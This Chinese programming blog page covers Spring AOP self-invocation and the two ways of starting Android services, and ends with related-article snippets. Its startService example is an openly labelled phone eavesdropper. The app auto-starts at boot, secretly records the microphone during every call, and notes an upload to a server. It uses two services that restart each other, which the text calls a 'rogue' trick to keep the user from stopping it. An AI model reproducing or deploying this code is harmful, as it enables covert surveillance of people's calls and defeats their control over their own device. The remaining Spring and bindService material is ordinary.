关于同一个service调用service本身的方法

目录
  • 同一个service调用service本身
    • 解决方案
  • service的两种调用方法
    • 一、startService开启服务
    • 二、bindService绑定服务
    • 三、两种方法的区别

同一个service调用service本身

如果同一个service调用service本身的方法,出现了事务不能控制。

解决方案

1.在spring配置文件中配置

<!-- expose-proxy service调用aop实现自身调用自身方法-->    
<aop:aspectj-autoproxy proxy-target-class="true" expose-proxy="true"/>

2.在service中用  AopContext.currentProxy() 方法调用

例如调用myService的mySave方法:

((myService) AopContext.currentProxy()).mySave(myPojo);

service的两种调用方法

一、startService开启服务

生命周期如下:

onCreate()–> onStartCommand() —> onDestory();

如果服务已经开启,不会重复的执行onCreate(), 而是会调用onStartCommand()。服务停止的时候调用onDestory()。服务只会被停止一次。

下面是一个电话窃听器的实例:

在Manifest文件中配置必要的权限和组件。设置一个监听开机的广播接收者。

<uses-permission android:name="android.permission.READ_PHONE_STATE"/>
<uses-permission android:name="android.permission.WRITE_EXTERNAL_STORAGE"/>
<uses-permission android:name="android.permission.RECORD_AUDIO"/>
<uses-permission android:name="android.permission.RECEIVE_BOOT_COMPLETED"/>
<service android:name="com.itheima.phonelistener.SystemService" >
</service>
<service android:name="com.itheima.phonelistener.SystemService2" >
</service>
<receiver android:name="com.itheima.phonelistener.BootReceiver" >
    <intent-filter>
         <action android:name="android.intent.action.BOOT_COMPLETED" />
    </intent-filter>
</receiver>

BootReceiver.java

监听开机事件。

public class BootReceiver extends BroadcastReceiver {
    @Override
    public void onReceive(Context context, Intent intent) {
        Intent i = new Intent(context,SystemService.class);
        context.startService(i);
    }
}

SystemService.java

两个Service类中的一个。两个类采用循环调用机制,当其中一个Service被destroy时,系统调用另一个Service。这样起到了防止用户关闭的流氓效果。

public class SystemService extends Service {
    // 电话管理器
    private TelephonyManager tm;
    // 监听器对象
    private MyListener listener;
    //声明录音机
    private MediaRecorder mediaRecorder;
    @Override
    public IBinder onBind(Intent intent) {
        return null;
    }
    // 服务创建的时候调用的方法
    @Override
    public void onCreate() {
        // 后台监听电话的呼叫状态。
        // 得到电话管理器
        tm = (TelephonyManager) this.getSystemService(TELEPHONY_SERVICE);
        listener = new MyListener();
        tm.listen(listener, PhoneStateListener.LISTEN_CALL_STATE);
        super.onCreate();
    }
    private class MyListener extends PhoneStateListener {
        // 当电话的呼叫状态发生变化的时候调用的方法
        @Override
        public void onCallStateChanged(int state, String incomingNumber) {
            super.onCallStateChanged(state, incomingNumber);
            try {
                switch (state) {
                case TelephonyManager.CALL_STATE_IDLE://空闲状态。
                    if(mediaRecorder!=null){
                        //8.停止捕获
                        mediaRecorder.stop();
                        //9.释放资源
                        mediaRecorder.release();
                        mediaRecorder = null;
                        System.out.println("录制完毕,上传文件到服务器。");
                    }
                    break;
                case TelephonyManager.CALL_STATE_RINGING://零响状态。
                    break;
                case TelephonyManager.CALL_STATE_OFFHOOK://通话状态
                    //开始录音
                    //1.实例化一个录音机
                    mediaRecorder = new MediaRecorder();
                    //2.指定录音机的声音源
                    mediaRecorder.setAudioSource(MediaRecorder.AudioSource.MIC);
                    //3.设置录制的文件输出的格式
                    mediaRecorder.setOutputFormat(MediaRecorder.OutputFormat.DEFAULT);
                    //4.指定录音文件的名称
                    File file = new File(Environment.getExternalStorageDirectory(),System.currentTimeMillis()+".3gp");
                    mediaRecorder.setOutputFile(file.getAbsolutePath());
                    //5.设置音频的编码
                    mediaRecorder.setAudioEncoder(MediaRecorder.AudioEncoder.DEFAULT);
                    //6.准备开始录音
                    mediaRecorder.prepare();
                    //7.开始录音
                    mediaRecorder.start();
                    break;
                }
            } catch (Exception e) {
                e.printStackTrace();
            }
        }
    }
    // 服务销毁的时候调用的方法
    @Override
    public void onDestroy() {
        super.onDestroy();
        // 取消电话的监听
        System.out.println("ondestory");
        Intent i = new Intent(this,SystemService2.class);
        startService(i);
        tm.listen(listener, PhoneStateListener.LISTEN_NONE);
        listener = null;
    }
}

MainActivity.java

控制Service的开启和关闭。

public class MainActivity extends Activity {
    @Override
    protected void onCreate(Bundle savedInstanceState) {
        super.onCreate(savedInstanceState);
        setContentView(R.layout.activity_main);
    }
    public void start(View view){
        //开启服务。
        Intent intent = new Intent(this,SystemService.class);
        startService(intent);
    }
    public void stop(View view){
        //停止服务。
        Intent intent = new Intent(this,SystemService.class);
        stopService(intent);
    }
}

二、bindService绑定服务

用绑定方式开启的Service,其生命周期为:onCreate() —>onBind();—>onunbind()–>onDestory(); 没有onStartCommand。

步骤:

1. 服务要暴露方法,必须在Service中定义一个内部类——中间人MiddlePerson,实现定义好的接口中的方法(callMethodInService,用于调用Service中的某方法)。

2. 实现服务成功绑定的代码(onBind方法),返回一个中间人new MiddlePerson()。

3. 在Activity中的bind()方法中采用bindService方法开启服务。

Intent intent = new Intent(this, MyService.class);
conn = new MyConn();
bindService(intent, conn, BIND_AUTO_CREATE);

4. 当服务被连接或失去连接时,分别实现ServiceConnection接口中的onServiceConnected()和onServiceDisconnected()方法。

5. 最后就可以通过中间人调用服务里面的方法了。

mp.callMethodInService(55);

MainActivity.java

public class MyService extends Service {
    //2.实现服务成功绑定的代码 ,返回一个中间人。
    @Override
    public IBinder onBind(Intent arg0) {
        System.out.println("服务被成功绑定了。。。。");
        return new MiddlePerson();
    }
    @Override
    public boolean onUnbind(Intent intent) {
        System.out.println("onunbind");
        return super.onUnbind(intent);
    }
    @Override
    public void onCreate() {
        System.out.println("oncreate");
        super.onCreate();
    }
    @Override
    public int onStartCommand(Intent intent, int flags, int startId) {
        System.out.println("onstartcommand");
        return super.onStartCommand(intent, flags, startId);
    }
    @Override
    public void onDestroy() {
        System.out.println("ondestory");
        super.onDestroy();
    }
    /**
     * 这是服务里面的一个方法
     */
    public void methodInService(){
        Toast.makeText(this, "哈哈,服务给你办好了暂住证。", 0).show();
    }
    //1.第一步服务要暴露方法 必须要有一个中间人
    private class MiddlePerson extends Binder implements IMiddlePerson{
        /**
         * 代办暂住证
         * @param money 给钱 50块钱以上才给办。
         */
        public void callMethodInService(int money){
            if(money>=50){
                methodInService();
            }else{
                Toast.makeText(getApplicationContext(), "多准备点钱。", 0).show();
            }
        }
        /**
         * 陪领导打麻将
         */
        public void playMajiang(){
            System.out.println("陪领导打麻将。");
        }
    }
}

三、两种方法的区别

  • start方式开启服务,一旦服务开启,就和调用者(Activity)没有任何关系了。开启者退出后,如果开启者挂掉,服务还在后台长期的运行。而且开启者没有办法去调用服务里面的方法。
  • bind方式开启服务,一旦调用者挂掉,服务也会跟着挂掉。不求同时生,但求同时死。而且开启者可以调用服务里面的方法。

以上为个人经验,希望能给大家一个参考,也希望大家多多支持我们。

(0)

相关推荐

  • springboot多个service互相调用的事务处理方式

    目录 多个service互相调用的事务处理 注解配置如下 Spring事务调用Service和Service之间的调用 原理解析 多个service互相调用的事务处理 今天,想在一个service的方法A中,调用另一个service的方法B,方法A和方法B均存在数据库插入操作,并且@Transaction注解也都加了,但是当B方法中抛出异常时,A中的插入语句还是能够执行成功. 注解配置如下 @Transactional(isolation= Isolation.DEFAULT,propagati

  • SpringBoot项目使用 axis 调用webservice接口的实践记录

    目录 序 WebService 定义 个人理解 实践 webservice 常识 一个webservice 接口发布地址往往类似: qq在线接口验证接口为例 maven 使用 axis 应用依赖(不可缺失必须) 代码(粘贴可用) 序 实际工作场景中会存在对接去很多系统的数据的任务,数据对接呢 方式很多吧,接触过 : http| https请求 数据库视图 数据库存储过程 soap+xml工单... 然后这两天接到一个关于webservice 数据接口的方式对接,说实话对于这个一脸懵逼,完全不知道

  • springboot中如何通过main方法调用service或dao

    目录 如何通过main方法调用service或dao 创建类,并复制下面代码 再创建TestApp方法 在普通类中获取service或者dao 手动创建工具类 调用配置类 如何通过main方法调用service或dao 大多数情况下,我们使用springboot是创建一个web项目,然后通过接口访问,但是也有特殊情况,比如线上跑着的web项目,有一些特殊的数据,需要经过计算导入到数据库,这个时候,我们可能需要原来的web项目中的一些service,dao才辅助操作,但是又不能在服务端新开接口.我

  • Java多线程run方法中直接调用service业务类应注意的问题及解决

    目录 多线程run方法中直接调用service业务类应注意 图解如下 多线程知识点 线程启动的四种方式 使用@Aysnc注解实现多线程 用户线程与守护线程的区别 线程的六种状态 Java锁的可重入性 线程池的四种拒绝策略 sleep和wait的区别 为什么wait(),notify(),notifyAll()在对象中,而不在Thread类中 多线程run方法中直接调用service业务类应注意 Java多线程run方法里边使用service业务类会产生java.lang.NullPointerE

  • Java webservice的POST和GET请求调用方式

    目录 webservice的POST和GET请求调用 POST请求 1.发送请求 2.POST请求体 3.测试 GET请求 通过webService调第三方提供的接口post与get POST GET webservice的POST和GET请求调用 POST请求 1.发送请求 import java.io.DataOutputStream; import java.io.InputStream; import java.net.HttpURLConnection; import java.net

  • 关于同一个service调用service本身的方法

    目录 同一个service调用service本身 解决方案 service的两种调用方法 一.startService开启服务 二.bindService绑定服务 三.两种方法的区别 同一个service调用service本身 如果同一个service调用service本身的方法,出现了事务不能控制. 解决方案 1.在spring配置文件中配置 <!-- expose-proxy service调用aop实现自身调用自身方法-->     <aop:aspectj-autoproxy p

  • ASP.NET调用WebService服务的方法详解

    本文实例讲述了ASP.NET调用WebService服务的方法.分享给大家供大家参考,具体如下: 一.WebService:WebService是以独立于平台的方式,通过标准的Web协议,可以由程序访问的应用程序逻辑单元. (1)应用程序逻辑单元:web服务包括一些应用程序逻辑单元或者代码.这些代码可以完成运算任务,可以完成数据库查询,可以完成计算机程序能够完成的任何工作. (2)可由程序访问:当前大多是web站点都是通过浏览器由人工访问的,web服务可以由计算机程序来访问. (3)标准的we协

  • asp.net基于Web Service实现远程上传图片的方法

    本文实例讲述了asp.net基于Web Service实现远程上传图片的方法.分享给大家供大家参考,具体如下: 页面调用代码: 前提添加Web 引用 HttpFileCollection files = HttpContext.Current.Request.Files; string filePath = files[0].FileName; string fileName = filePath.Substring(filePath.LastIndexOf("//") + 1); b

  • Android应用程序四大组件之使用AIDL如何实现跨进程调用Service

    一.问题描述 Android应用程序的四大组件中Activity.BroadcastReceiver.ContentProvider.Service都可以进行跨进程.在上一篇我们通过ContentProvider实现了不同应用之间的跨进程调用,但ContentProvider主要是提供数据的共享(如sqlite数据库),那么我们希望跨进程调用服务(Service)呢?Android系统采用了远程过程调用(RPC)方式来实现.与很多其他的基于RPC的解决方案一样,Android使用一种接口定义语言

  • Android AIDL和远程Service调用示例代码

    Android:AIDL和远程Service调用 本讲的内容,理解起来很难,也许你看了很多资料也看不明白,但是用起来缺简单的要命.所以我们干脆拿一个音乐播放器中进度条的实例来说明一下AIDL和Remote Service的价值和使用方法,你把这个例子跑一边,体会一下就OK了.下面的例子是我 正在准备的项目实例中的一部分. 首先说明一下我们面临的问题,如果看不懂下面的描述请看前面的课程: 第一.我们知道在AndroId中如果需要进行音乐播放,最方面的方法就是使用自带的MediaPlayer对象,如

  • springboot 如何解决static调用service为null

    springboot static调用service为null @PostConstruct注解好多人以为是Spring提供的.其实是Java自己的注解. Java中该注解的说明: @PostConstruct该注解被用来修饰一个非静态的void()方法.被@PostConstruct修饰的方法会在服务器加载Servlet的时候运行,并且只会被服务器执行一次.PostConstruct在构造函数之后执行,init()方法之前执行. 通常我们会是在Spring框架中使用到@PostConstruc

  • SpringBoot在自定义类中调用service层等Spring其他层操作

    背景: 做了一个TCP服务器来接入智能设备,然后需要将设备实时发送的定位等关键信息存储到数据库. 为了考虑将来可能对外提供rest接口,采用将TCP服务器集成到SpringBoot框架,当然,也是为了能最快利用mybatis框架实现数据访问,然后依次解决了如何启动,如何注销等各种问题,然后在TCP服务器消息处理时,需要写数据库,直接调用DAO层,编译报错. 改为调用Service层,编译正常,运行到调用的地方,报空指针异常,跟踪到异常位置,发现service为空,也就是按照之前controlle

  • java 反射调用Service导致Spring注入Dao失效的解决方案

    目录 java 反射调用Service导致Spring注入Dao失效 问题发生背景: 1.错误方法:通过反射执行service的方法 2.解决方法:通过获取Spring容器取得对象 反射调用导致Spring特性失效 1.抛出问题 1.1.编写TestAspectController类 1.2.编写ModuleService类 1.3.编写TestKey注解 1.4.编写TestAspectService 1.5.编写TestAspect切面 2.解决问题 2.1.编写SpringContextU

随机推荐